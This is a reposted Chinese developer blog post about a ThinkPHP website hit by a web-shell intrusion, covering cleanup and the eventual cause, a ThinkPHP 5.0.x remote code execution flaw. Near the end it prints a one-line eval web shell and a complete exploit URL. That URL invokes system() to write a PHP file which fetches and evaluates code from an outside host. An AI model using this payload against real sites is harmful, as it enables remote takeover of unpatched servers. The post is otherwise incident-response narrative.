苍了个天了~网站被挂马!
2019-02-27 11:54:07来源:博客园 阅读 ()
【注:PHP、ThinkPHP】
事情是这样的~
2019年2月12日,根据客户的反应,说点击网站上的链接都会跳转的别的第三方的网站。然后就开始排查,登录上服务器,把项目的所有文件拷贝下来。
打开入口文件,里面的代码原来是被替换成静态的前端代码~我晕~ 当务之急是让网站可以正常的运行,先把这入口文件改回以前的代码上传到服务器,这样网站暂时是可以正常运行了。
但是需要找的问题的根本所在,这种网站代码恶意被修改的事我是第一次遇到,以前都是听说过没见过。 没有经验,就上百度。找一下这个问题的处理和排查流程。
根据网上所述,首先是将一句话代码(<?php @eval($_POST['a'])>)上传到网站,然后通过这个一句上传一个可以操作网站目录的文件,再通过这个文件对网站的代码进行修改和上传。
所以现在要做的是:
1、首先找到已经被上传到网站的恶意文件,将其删除。
2、找到攻击者所利用的代码中的漏洞。
怎么找到那些已经被上传上来的文件,可以下载安全狗对拷贝下来的所有代码进行扫描,这些文件的代码有的写法会相同。会存在一些函数 eval、assert,这些文件还好找,找着后在服务器上删除就好了。难的是找到代码中的漏洞,网上提供了一些可能会出现漏洞的地方,一个是上传文件的地方,一个是编辑器插件中带的上传功能。
这些地方我一个试了试,排查了一遍。
2月13日,我发现网站首页又被修改了,看来问题的根本没有找对,继续在网上百度,问一些大佬。
2月14日,还是再找。
2月15日,一位大佬给我发来了一个ThinkPHP框架的漏洞信息,说的是ThinkPHP5.0 ~ 5.0.23之间的版本都存在一个严重的漏洞,可通过这个漏洞执行写文件的操作。
赶紧升级版本,升级的安全的版本。
之后,我也试了一下有漏洞的那个版本,真的可以很容易的将想要的代码写入到文件,然后在线上运行。
而且就是一行连接就能搞定:
项目域名加上
?s=/index/\think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=echo%20^%3C?php%20@eval(file_get_contents(%22http%3a%2f%2fcqy666.cn%2fphp.jpg%22))?^%3E%3Etest.php
然后访问test.php,就能操作网站的所有目录了。Amezing~
原文链接:https://www.cnblogs.com/heiue/p/10438793.html
如有疑问请与原作者联系
标签:
版权申明:本站文章部分自网络,如有侵权,请联系:west999com@outlook.com
特别注意:本站所有转载文章言论不代表本站观点,本站所提供的摄影照片,插画,设计作品,如需使用,请与原作者联系,版权归原作者所有
下一篇:[日常] imap协议读取邮件
- php中动态修改ini配置 2020-03-13
- PHP怎么读取超大文件 2020-03-10
- PHP生成网站桌面快捷方式代码分享 2020-03-04
- 简单实现php上传文件功能 2020-02-15
- thinkPHP5分页功能实现方法分析 2020-02-08
IDC资讯: 主机资讯 注册资讯 托管资讯 vps资讯 网站建设
网站运营: 建站经验 策划盈利 搜索优化 网站推广 免费资源
网络编程: Asp.Net编程 Asp编程 Php编程 Xml编程 Access Mssql Mysql 其它
服务器技术: Web服务器 Ftp服务器 Mail服务器 Dns服务器 安全防护
软件技巧: 其它软件 Word Excel Powerpoint Ghost Vista QQ空间 QQ FlashGet 迅雷
网页制作: FrontPages Dreamweaver Javascript css photoshop fireworks Flash